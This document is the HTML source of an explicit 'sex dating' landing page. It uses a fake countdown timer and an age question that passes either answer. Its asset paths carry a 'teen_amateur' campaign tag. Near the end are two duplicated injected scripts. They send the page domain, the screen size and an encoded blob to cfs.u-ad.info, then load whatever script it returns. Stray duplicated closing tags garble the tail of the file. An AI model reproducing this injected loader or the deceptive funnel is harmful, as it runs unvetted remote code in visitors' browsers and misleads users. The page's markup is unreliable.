<!DOCTYPE html>
<html lang="en">

    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1">

        <title>The World's Largest Sex Dating Site</title>

        <link href='http://fonts.googleapis.com/css?family=Roboto:400,300,700' rel='stylesheet' type='text/css'>
        <link href='http://fonts.googleapis.com/css?family=Raleway:400,700' rel='stylesheet' type='text/css'>

        <script src="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/js/jquery.d566fa9f6e991a6f4449e20a55cbbf6b.js"></script>
        <script src="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/js/vegas.5623475bda32ac343029e0d882d1d397.js"></script>
        <script src="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/js/jquery.countdown.eaebf74138d64049fa5eaa19d5bddfe5.js"></script>

        <link href="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/css/font-awesome.min.9359a58c7ea6d59a780e87c92fd7d16b.css" rel="stylesheet">
        <link rel="stylesheet" href="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/css/bootstrap.min.99c5f994d59f964b93d695845124892d.css" />

        <link rel="stylesheet" href="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/css/animate.ca1e8d0feeeefc5bcfe12db46c596878.css" />
        <link rel="stylesheet" href="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/css/vegas.ed09626c683ddb4f8ade5947a5dae2f2.css" />

        <link rel="shortcut icon" href="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/images/favicon.5fa3fb9c021347eb7a201105be727308.png" type="image/x-icon">
        <link rel="icon" href="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/images/favicon.5fa3fb9c021347eb7a201105be727308.png" type="image/x-icon">
    
<style type="text/css">
    body {
    color:#666;
    font:300 15px/15px Roboto,Arial,Helvetica;
    background-color:#fff;
    -webkit-font-smoothing:antialiased;
    background-color: #eee;
}

a {
    color:#CA2D8E;
    text-decoration:none;
}

a:hover{
    color:#666;
}

.btn,a,.btn:hover,a:hover {
    -webkit-transition: all 0.3s ease-in-out;
    -moz-transition: all 0.3s ease-in-out;
    -ms-transition: all 0.3s ease-in-out;
    -o-transition: all 0.3s ease-in-out;
    transition: all 0.3s ease-in-out;
    outline: none !important;
}

h1,h2,h3,h4 {
    margin: 0;
    line-height: 1em;
}

h1 {
    font:700 2em Raleway,Arial,Helvetica;margin-bottom: 1.5em;
    margin-bottom: 20px;
    color: #000000;
}

h2 {
    font:700 2em Raleway,Arial,Helvetica;
    margin-bottom: 1.5em;
    margin-bottom: 20px;
    color: #000000;}
h3 {
    font:700 4em Raleway,Arial,Helvetica;
    margin:0.5em 0;
    color: #008ec0;
}
h3 {
    color: ;
    text-shadow: 2px 2px 4px #000000;
}

p {
    font-size:1.4em;
    line-height: 1.4em;
    padding-right: 30px;
    margin-bottom: 1.4em;
}

.container {
    width: 100%;
    max-width: 1400px;
}

.wrapper {
    background-color: #fff;
    height:0em;
}

.spacer {
    padding:2em;
    padding-bottom:0;
}

.btn {
    border:none;border-radius: 0;
    padding: 1.44em 3em;
    font-size: 15px;
    text-transform: uppercase;
    margin-bottom: 20px;
}

.btn-danger {
    background: rgb(242, 24, 97) !important;
}

.btn-end {
    background: rgb(242, 24, 97) !important;
    border:none;border-radius: 0;
    padding: 1.44em 3em;
    font-size: 15px;
    color: #fff;
    text-decoration: none;
    text-transform: uppercase;
}

.btn-end:hover,.btn:active {
    color: #fff;
    background: rgb(82, 82, 82) !important;
    box-shadow: none;
    text-decoration: none;
}

.btn:hover,.btn:active {
    color: #fff;
    background: rgb(82, 82, 82) !important;
    box-shadow: none;
}

.overlay {
    background:rgba(242, 24, 97, 0.9);
}

.carousel-control {
    width: 10%;
}

.carousel-control i.fa {
    top: 50%;
    position: absolute;
    margin-top: -30px;
    left: 0;
    right: 0;
}

.carousel .item a.view{
    position: absolute;
    top: -10%;
    left:50%;
    text-align: center;
    background: rgb(242, 24, 97);
    color: #fff;
    display: inline-block;
    padding:0.75em 2em;
    font-size: 1.25em;
    margin-top: -24px;
    margin-left: -70px;
}

.carousel .item:hover a.view{
    top:50%;
    text-decoration: none;
}

.clock {
    font: 700 1.6em Raleway,Arial,Helvetica;
    margin-bottom: 20px;
    color: #f21861;
}



/*=====================================================
=            Bootstrap Media Queries            =
=====================================================*/

@media only screen and (max-width : 1200px) {
h1 {
    font: 700 2em Raleway,Arial,Helvetica;
    margin-bottom: 20px;
}

p {
    font-size:1.1em;
    line-height: 1.1em;
    padding-right: 30px;
    margin-bottom: 1.4em;
}

}

@media only screen and (max-width : 979px) {
h1 {
    font: 700 1.5em Raleway,Arial,Helvetica;
    margin-bottom: 20px;
    text-align: center;
}

p {
    font-size:1.1em;
    line-height: 1.1em;
    padding-right: 30px;
    margin-bottom: 1.4em;
    text-align: center;
}

.step {
    margin: 0;
    text-align: center;
}

.clock {
    font: 700 1.6em Raleway,Arial,Helvetica;
    margin-bottom: 20px;
    text-align: center;
}

}

@media only screen and (max-width : 767px) {
h1 {
    font: 700 1.5em Raleway,Arial,Helvetica;
    margin-bottom: 20px;
    text-align: center;
}

p {
   font-size:1.1em;
   line-height: 1.1em;
   padding-right: 30px;
   padding-left: 30px;
   margin-bottom: 1.4em;
   text-align: center;
}

}

@media only screen and (max-width : 480px) {

}

@media only screen and (max-width : 320px) {

}
</style>
</head>

<body id="home">

<div class="container">
    <div class="wrapper">
        <div class="row">
            <div class="col-md-7 wowload fadeInLeft">
                <div id="carousel-about" class="carousel slide" data-ride="carousel" data-interval="2500">
                    <div class="carousel-inner" role="listbox">
                        <div class="item active">
						<img src="http://s33.postimg.org/tu6zowdbz/135.jpg" class="img-responsive">
						</div>
                    </div>
                </div>
            </div>

            <div class="col-md-5 wowload fadeInRight">
                <div class="spacer"></div>
                    <div class="content">
					<center>
                        <div class="clock">03:00

						</center>
                        </div>
                            <h3>Adult Dating & Free Sex Hookup</h3>

                <div class="step">
                            <h1>Who Do You Want to Fuck Tonight?</h1>
                <a href="javascript:void(0)" class="step_button btn btn-primary step_button_1 next"><span>Man</span></a>
                <a href="javascript:void(0)" class="step_button btn btn-danger step_button_2 next"><span>Women</span></a>
                </div>



                <div class="step" style="display:none;">
                <h2>Are you 24 or older?</h2>
                <a href="javascript:void(0)" class="step_button btn btn-primary step_button_1 next"><span>No</span></a>
                <a href="javascript:void(0)" class="step_button btn btn-danger step_button_2 next"><span>Yes</span></a>
                </div>



                <div class="step" style="display:none;">
                <h2>What You Really Want Is Sex Only Dating Tap on the <font color="red">"CONTINUE"</font> button to find our SEXY SINGLES</h2>
                <a href="%linkcampaign%" class="btn btn-end"><span>Continue</span></a>
                </div>
            </div>
        </div>
    </div>
</div>

<script language="JavaScript" type="text/javascript">
function clear_delay(e){window.clearTimeout(e)}function run_loading_run_1(e){timeoutID1=window.setTimeout(run_loading_1,e)}function run_loading_1(){$(".thank_for_close, .run_loading_2").fadeIn();$(".main_review").hide()}function run_loading_run_2(e){timeoutID2=window.setTimeout(run_loading_2,e)}function run_loading_2(){$(".thank_for_close, .run_loading_2").hide();$(".run_loading_3, .li_run_loading_1, .li_run_loading_2").fadeIn()}function run_loading_run_3(e){timeoutID3=window.setTimeout(run_loading_3,e)}function run_loading_3(){$(".run_loading_3").hide();$(".run_loading_4, .li_run_loading_3").fadeIn()}function run_loading_run_4(e){timeoutID3=window.setTimeout(run_loading_4,e)}function run_loading_4(){$(".run_loading_4, .loading").hide();$(".li_run_loading_4, li_run_loading_5, .run_loading_5, .show_end").fadeIn()}$(function(){$(document).on("click",".next",function(e){e.preventDefault();$(this).parent().hide().next().fadeIn()});$(document).on("click",".run_loading",function(e){e.preventDefault();$(this).parent().hide().next().fadeIn();$(".step4 .loading").show();run_loading_run_1("1000");run_loading_run_2("2250");run_loading_run_3("3000");run_loading_run_4("4000")})})
</script>

<script src="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/js/wow.min.d5352aa7cf31fd211aa6e221c9bf4f93.js"></script>
<script src="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/js/bootstrap.f4b3cabf77c4c52b735a071b68714d22.js" type="text/javascript" ></script>
<script src="http://cdn.offersupply.com/adu_en_15_45_temp_1_sub_1_5_count_q1_sta_all_teen_amateur_jm/js/touchswipe.min.bed6b0479f105f725a43f5bbbc190b4a.js"></script>

<script type="text/javascript">
$("#example, body").vegas({
    delay: 5000,
    timer: false,
    shuffle: true,
    transition: 'fade',
    transitionDuration: 2000,
    slides: [
        { src: 'http://605823835.r.cdnsun.net/LanderBlog/landerbaru5/137.jpg' },

    ]
});
</script>

<script type="text/javascript">

var interval = setInterval(function() {
    var timer = $('.clock').html();
    timer = timer.split(':');
    var minutes = parseInt(timer[0], 10);
    var seconds = parseInt(timer[1], 10);
    seconds -= 1;
    if (minutes < 0) return clearInterval(interval);
    if (minutes < 10 && minutes.length != 2) minutes = '0' + minutes;
    if (seconds < 0 && minutes != 0) {
        minutes -= 1;
        seconds = 59;
    }
    else if (seconds < 10 && length.seconds != 2) seconds = '0' + seconds;
    $('.clock').html(minutes + ':' + seconds);

    if (minutes == 0 && seconds == 0)
        clearInterval(interval);
}, 1000);

</script>

<script>
  dataLayer = [];
</script>

<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-TMR4NP"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TMR4NP');</script>

<script>
dataLayer.push({

});
</script>

<script type="text/javascript">BLOG_initCsi('classic_blogspot');</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpne93FGlfNSsREoHXT4lfGg0QN720IbRJljxg7x1oiomph%2b6LiInkeG3borfMmE7Y3IZuVYsw8kF2FiWJE8COYZXNRwG4lKxgvFcKp670QXscFqZiMtNaqH4nnFCkJsGKlm%2fmD0xl1iw5cY0S4h5FTVIBkpNUk4CicNQKIUnQAd%2f9xhEMItIftnknCLeqsGQ9BGvyUCTAGaUcCK%2bcmhGIiFDc1Sj53PyLf3Yky1GeIEtIDzhPe8%2faMb%2bvw8cafJ8zS3rjFVsK331fDKt0qNZ3OnAHm5IP1VUwVBYI%2b7ETtdNKkQ77NJdbxDcJSfywVPxLeI8CmS2gLngJT%2bJPk6McAsfYcD3WeuAtyD%2bVTNcVKKqlb9FwIUxMXD4R7einqMorfZOUOwSe0kvy%2friL6%2b21QKl4ap9kHCDKDwkncgDztDHbNxHAsolMd09QnjTzf5o%2fnfFsctAIDQOlf2EMAqfQ7%2brMw2a3palk3ZEe2DzjkP8c%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpney%2f%2fPrlewvi1uvNn8u6JdHQuVCWqE6uIqTjs89O%2fx%2bjNC3Jy90tj5TILu9%2fXQEpunVdZ646Kj3PFypdoHBUfYwgJ919Dc8BW558HnoJJCnQmGLBYbbRgq3a3ghESc9j3rMyPrOLBjj81Q6xEkHsIsQCN4dOdZ5JI%2brE52CvFTCzdzjR%2fJP2t39DcbBOfNpOfoSPkhR5TlNG93mRKW0j7hBykzqoNa1grumV0k8iLsGtVgwhd7Koergu1P60L0NW6WqsiGNGUhxLXxXYiGFuBLh39xWALC%2biOf7lSd%2bSGzc0vBa8D%2bC1OeO9OFQTSgikWe6NiPC6WkmZmXkOKl97QWQs8HnKLkmBBArXV42O4KdR42xehQuLfR5tyZEiDXQNlpQfFzQ%2bGZidEn0nrLP7VGpjNoT%2b9XInBTq4MKN1WlKeL5KyYfSi10aj1EFI0tfLVPFZSsPIU67A0%2fiDJkyDqecqqKdEM679gGGAiUMrPG5bbwIp9yF%2bZFsuUdr7h0V5wWZpe31rA2PO3CQS3unqplAl%2fGdn1QnydQtAGx58wjO6rvUkKF00i4Q%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html></<textarea>
                </div>
            </div>
        </aside>



</div>



</body>
</html>
</<textarea>
                </div>
            </div>
        </aside>
        


</div>



</body>
</html>
